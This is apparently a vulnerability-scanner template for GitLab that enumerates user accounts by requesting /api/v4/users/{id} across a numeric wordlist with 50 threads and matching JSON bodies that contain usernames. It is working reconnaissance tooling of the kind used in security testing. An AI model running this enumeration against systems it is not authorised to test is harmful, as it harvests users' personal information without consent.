id: gitlab-user-open-api

info:
  author: Suman_Kar
  name: GitLab - User Information Disclosure Via Open API
  severity: medium
  tags: gitlab,disclosure
  reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158

requests:
  - payloads:
      uid: helpers/wordlists/numbers.txt
    attack: sniper
    threads: 50

    raw:
      - |
        GET /api/v4/users/{{uid}} HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en-US,en;q=0.9
        Accept: application/json, text/plain, */*
        Referer: {{BaseURL}}
        Connection: keep-alive

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "username.*"
          - "id.*"
          - "name.*"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
